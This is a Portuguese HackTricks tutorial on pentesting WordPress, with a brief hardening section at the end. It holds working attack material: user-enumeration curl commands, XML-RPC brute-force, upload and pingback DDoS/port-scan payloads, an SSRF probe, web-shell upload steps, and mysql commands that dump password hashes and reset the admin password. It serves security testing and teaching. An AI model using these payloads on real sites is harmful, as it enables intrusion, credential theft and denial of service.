21 KiB
Wordpress
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- Você trabalha em uma empresa de segurança cibernética? Você quer ver sua empresa anunciada no HackTricks? ou você quer ter acesso à última versão do PEASS ou baixar o HackTricks em PDF? Verifique os PLANOS DE ASSINATURA!
- Descubra A Família PEASS, nossa coleção exclusiva de NFTs
- Adquira o swag oficial do PEASS & HackTricks
- Junte-se ao 💬 grupo Discord ou ao grupo telegram ou siga-me no Twitter 🐦@carlospolopm.
- Compartilhe suas técnicas de hacking enviando PRs para o repositório hacktricks e hacktricks-cloud repo.
Use Trickest para construir e automatizar fluxos de trabalho com as ferramentas comunitárias mais avançadas do mundo.
Obtenha acesso hoje:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
Informações básicas
Os arquivos enviados vão para: http://10.10.10.10/wp-content/uploads/2018/08/a.txt
Os arquivos de temas podem ser encontrados em /wp-content/themes/, então se você alterar algum php do tema para obter RCE, provavelmente usará esse caminho. Por exemplo: Usando o tema twentytwelve você pode acessar o arquivo 404.php em: /wp-content/themes/twentytwelve/404.php
Outra URL útil poderia ser: /wp-content/themes/default/404.php
No arquivo wp-config.php você pode encontrar a senha raiz do banco de dados.
Caminhos de login padrão para verificar: /wp-login.php, /wp-login/, /wp-admin/, /wp-admin.php, /login/
Principais arquivos do WordPress
index.php
license.txt
contém informações úteis, como a versão do WordPress instalada.wp-activate.php
é usado para o processo de ativação por e-mail ao configurar um novo site WordPress.- Pastas de login (podem ser renomeadas para ocultá-las):
/wp-admin/login.php
/wp-admin/wp-login.php
/login.php
/wp-login.php
xmlrpc.php
é um arquivo que representa um recurso do WordPress que permite a transmissão de dados com HTTP atuando como mecanismo de transporte e XML como mecanismo de codificação. Esse tipo de comunicação foi substituído pela REST API do WordPress.- A pasta
wp-content
é o diretório principal onde os plugins e temas são armazenados. wp-content/uploads/
é o diretório onde quaisquer arquivos enviados para a plataforma são armazenados.wp-includes/
Este é o diretório onde os arquivos principais são armazenados, como certificados, fontes, arquivos JavaScript e widgets.
Pós-exploração
- O arquivo
wp-config.php
contém informações necessárias pelo WordPress para se conectar ao banco de dados, como o nome do banco de dados, host do banco de dados, nome de usuário e senha, chaves e salts de autenticação e o prefixo da tabela do banco de dados. Este arquivo de configuração também pode ser usado para ativar o modo DEBUG, que pode ser útil na solução de problemas.
Permissões de usuários
- Administrador
- Editor: Publica e gerencia suas próprias postagens e as de outros usuários.
- Autor: Publica e gerencia suas próprias postagens.
- Contribuidor: Escreve e gerencia suas próprias postagens, mas não pode publicá-las.
- Assinante: Navega pelas postagens e edita seu perfil.
Enumeração passiva
Obter a versão do WordPress
Verifique se você pode encontrar os arquivos /license.txt
ou /readme.html
Dentro do código-fonte da página (exemplo de https://wordpress.org/support/article/pages/):
- grep
curl https://victim.com/ | grep 'content="WordPress'
meta name
- Arquivos de link CSS
- Arquivos JavaScript
Obter Plugins
curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-content/plugins/' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
Obter Temas
curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-content/themes' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
Extrair versões em geral
curl -s -X GET https://wordpress.org/support/article/pages/ | grep http | grep -E '?ver=' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
Use Trickest para construir e automatizar facilmente fluxos de trabalho com as ferramentas comunitárias mais avançadas do mundo.
Obtenha acesso hoje:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
Enumeração ativa
Plugins e Temas
Provavelmente, você não será capaz de encontrar todos os Plugins e Temas possíveis. Para descobrir todos eles, você precisará forçar ativamente uma lista de Plugins e Temas (felizmente, existem ferramentas automatizadas que contêm essas listas).
Usuários
Força bruta de ID
Você pode obter usuários válidos de um site WordPress por meio de força bruta de IDs de usuários:
curl -s -I -X GET http://blog.example.com/?author=1
Se as respostas forem 200 ou 30X, isso significa que o id é válido. Se a resposta for 400, então o id é inválido.
wp-json
Você também pode tentar obter informações sobre os usuários consultando:
curl http://blog.example.com/wp-json/wp/v2/users
Apenas informações sobre os usuários que possuem essa funcionalidade habilitada serão fornecidas.
Também observe que /wp-json/wp/v2/pages pode vazar endereços IP.
Enumeração de nome de usuário de login
Ao fazer login em /wp-login.php
, a mensagem é diferente se o nome de usuário indicado existe ou não.
XML-RPC
Se xml-rpc.php
estiver ativo, você pode realizar uma força bruta de credenciais ou usá-lo para lançar ataques DoS a outros recursos. (Você pode automatizar esse processo usando isso, por exemplo).
Para ver se está ativo, tente acessar /xmlrpc.php e envie esta solicitação:
Verificar
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>
Força Bruta de Credenciais
wp.getUserBlogs
, wp.getCategories
ou metaWeblog.getUsersBlogs
são alguns dos métodos que podem ser usados para força bruta de credenciais. Se você encontrar algum deles, pode enviar algo como:
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>pass</value></param>
</params>
</methodCall>
A mensagem "Nome de usuário ou senha incorretos" dentro de uma resposta de código 200 deve aparecer se as credenciais não forem válidas.
Usando as credenciais corretas, você pode fazer upload de um arquivo. Na resposta, o caminho aparecerá (https://gist.github.com/georgestephanis/5681982)
<?xml version='1.0' encoding='utf-8'?>
<methodCall>
<methodName>wp.uploadFile</methodName>
<params>
<param><value><string>1</string></value></param>
<param><value><string>username</string></value></param>
<param><value><string>password</string></value></param>
<param>
<value>
<struct>
<member>
<name>name</name>
<value><string>filename.jpg</string></value>
</member>
<member>
<name>type</name>
<value><string>mime/type</string></value>
</member>
<member>
<name>bits</name>
<value><base64><![CDATA[---base64-encoded-data---]]></base64></value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>
Também há uma maneira mais rápida de forçar credenciais usando system.multicall
pois você pode tentar várias credenciais na mesma solicitação:
Burlar 2FA
Este método é destinado a programas e não a humanos, e é antigo, portanto não suporta 2FA. Então, se você tiver credenciais válidas, mas a entrada principal estiver protegida por 2FA, você pode ser capaz de abusar do xmlrpc.php para fazer login com essas credenciais, burlando o 2FA. Observe que você não poderá executar todas as ações que pode fazer através do console, mas ainda poderá chegar ao RCE, como Ippsec explica em https://www.youtube.com/watch?v=p8mIdm93mfw&t=1130s
DDoS ou varredura de porta
Se você encontrar o método pingback.ping na lista, pode fazer o Wordpress enviar uma solicitação arbitrária para qualquer host/porta.
Isso pode ser usado para pedir que milhares de sites Wordpress acessem um local (para que um DDoS seja causado naquele local) ou você pode usá-lo para fazer o Wordpress escanear alguma rede interna (você pode indicar qualquer porta).
<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>http://<YOUR SERVER >:<port></string></value>
</param><param><value><string>http://<SOME VALID BLOG FROM THE SITE ></string>
</value></param></params>
</methodCall>
Se você receber um faultCode com um valor maior que 0 (17), significa que a porta está aberta.
Dê uma olhada no uso de system.multicall
na seção anterior para aprender como abusar desse método para causar DDoS.
DDoS
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://target/</string></value></param>
<param><value><string>http://yoursite.com/and_some_valid_blog_post_url</string></value></param>
</params>
</methodCall>
wp-cron.php DoS
Este arquivo geralmente existe na raiz do site Wordpress: /wp-cron.php
Quando este arquivo é acessado, uma consulta MySQL "pesada" é realizada, então ele pode ser usado por atacantes para causar um DoS.
Além disso, por padrão, o wp-cron.php
é chamado em cada carregamento de página (sempre que um cliente solicita qualquer página do Wordpress), o que em sites de alto tráfego pode causar problemas (DoS).
É recomendável desativar o Wp-Cron e criar um cronjob real dentro do host que execute as ações necessárias em um intervalo regular (sem causar problemas).
/wp-json/oembed/1.0/proxy - SSRF
Tente acessar https://worpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa9yirr7og2lukt10s6ju8.burpcollaborator.net e o site Wordpress pode fazer uma solicitação para você.
Esta é a resposta quando não funciona:
SSRF
{% embed url="https://github.com/t0gu/quickpress/blob/master/core/requests.go" %}
Esta ferramenta verifica se o methodName: pingback.ping e para o caminho /wp-json/oembed/1.0/proxy existem e, se existirem, tenta explorá-los.
Ferramentas Automáticas
cmsmap -s http://www.domain.com -t 2 -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0"
wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://www.domain.com [--plugins-detection aggressive] --api-token <API_TOKEN> --passwords /usr/share/wordlists/external/SecLists/Passwords/probable-v2-top1575.txt #Brute force found users and search for vulnerabilities using a free API token (up 50 searchs)
#You can try to bruteforce the admin user using wpscan with "-U admin"
Use Trickest para construir e automatizar facilmente fluxos de trabalho com as ferramentas comunitárias mais avançadas do mundo.
Obtenha acesso hoje:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
Obtenha acesso sobrescrevendo um pouco
Mais do que um ataque real, isso é uma curiosidade. No CTF https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man, você pode inverter 1 bit de qualquer arquivo do WordPress. Então, você pode inverter a posição 5389
do arquivo /var/www/html/wp-includes/user.php
para anular a operação NOT (!
).
if ( ! wp_check_password( $password, $user->user_pass, $user->ID ) ) {
return new WP_Error(
Panel RCE
Modificando um arquivo php do tema usado (são necessárias credenciais de administrador)
Aparência → Editor de Temas → Modelo 404 (à direita)
Altere o conteúdo para um shell php:
Pesquise na internet como você pode acessar essa página atualizada. Neste caso, você deve acessar aqui: http://10.11.1.234/wp-content/themes/twentytwelve/404.php
MSF
Você pode usar:
use exploit/unix/webapp/wp_admin_shell_upload
Plugin RCE
Plugin PHP
É possível fazer upload de arquivos .php como plugin.
Crie sua backdoor php usando, por exemplo:
Em seguida, adicione um novo plugin:
Faça o upload do plugin e pressione Instalar agora:
Clique em Proceder:
Provavelmente, isso não fará nada aparentemente, mas se você for para Mídia, verá sua shell carregada:
Acesse-a e você verá a URL para executar a reverse shell:
Fazendo upload e ativando plugin malicioso
(Esta parte é copiada de https://www.hackingarticles.in/wordpress-reverse-shell/)
Às vezes, os usuários logados não possuem autorização gravável para fazer modificações no tema do WordPress, então escolhemos "Inject WP pulgin malicious" como uma estratégia alternativa para adquirir uma web shell.
Portanto, uma vez que você tenha acesso a um painel do WordPress, pode tentar instalar um plugin malicioso. Aqui, já baixei o plugin vulnerável do exploit db.
Clique aqui para baixar o plugin para praticar.
Como temos o arquivo zip para o plugin, agora é hora de fazer o upload do plugin.
Painel > plugins > upload plugin
Procure o arquivo zip baixado, conforme mostrado.
Assim que o pacote for instalado com sucesso, precisamos ativar o plugin.
Quando tudo estiver bem configurado, vá para a exploração. Como instalamos o plugin vulnerável chamado "reflex-gallery" e é facilmente explorável.
Você obterá a exploração dessa vulnerabilidade dentro do framework Metasploit e, portanto, carregue o módulo abaixo e execute o seguinte comando:
À medida que os comandos acima são executados, você terá sua sessão meterpreter. Assim como retratado neste artigo, existem vários métodos para explorar um site com plataforma WordPress.
Pós-Exploração
Extrair nomes de usuários e senhas:
mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;select concat_ws(':', user_login, user_pass) from wp_users;"
Alterar a senha do admin:
Para alterar a senha do usuário admin no WordPress, você pode seguir os seguintes passos:
- Faça login no painel do WordPress com a conta do usuário admin.
- Clique em "Usuários" no menu à esquerda.
- Clique em "Editar" abaixo do nome do usuário admin.
- Role a página para baixo até a seção "Nova senha".
- Insira a nova senha desejada nos campos "Nova senha" e "Repetir nova senha".
- Clique em "Atualizar perfil" para salvar a nova senha.
mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;UPDATE wp_users SET user_pass=MD5('hacked') WHERE ID = 1;"
Proteção do WordPress
Atualizações regulares
Certifique-se de que o WordPress, plugins e temas estão atualizados. Confirme também se a atualização automática está habilitada no arquivo wp-config.php:
define( 'WP_AUTO_UPDATE_CORE', true );
add_filter( 'auto_update_plugin', '__return_true' );
add_filter( 'auto_update_theme', '__return_true' );
Também, instale apenas plugins e temas confiáveis do WordPress.
Plugins de Segurança
Outras Recomendações
- Remova o usuário padrão admin
- Use senhas fortes e 2FA
- Periodicamente revise as permissões dos usuários
- Limite as tentativas de login para prevenir ataques de Força Bruta
- Renomeie o arquivo
wp-admin.php
e permita o acesso somente internamente ou de certos endereços IP.
Use Trickest para construir e automatizar fluxos de trabalho facilmente, com as ferramentas comunitárias mais avançadas do mundo.
Acesse hoje:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- Você trabalha em uma empresa de cibersegurança? Quer ver sua empresa anunciada no HackTricks? ou quer ter acesso à última versão do PEASS ou baixar o HackTricks em PDF? Confira os PLANOS DE ASSINATURA!
- Descubra The PEASS Family, nossa coleção exclusiva de NFTs
- Adquira o swag oficial do PEASS & HackTricks
- Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-me no Twitter 🐦@carlospolopm.
- Compartilhe suas técnicas de hacking enviando PRs para o repositório hacktricks e para o repositório hacktricks-cloud.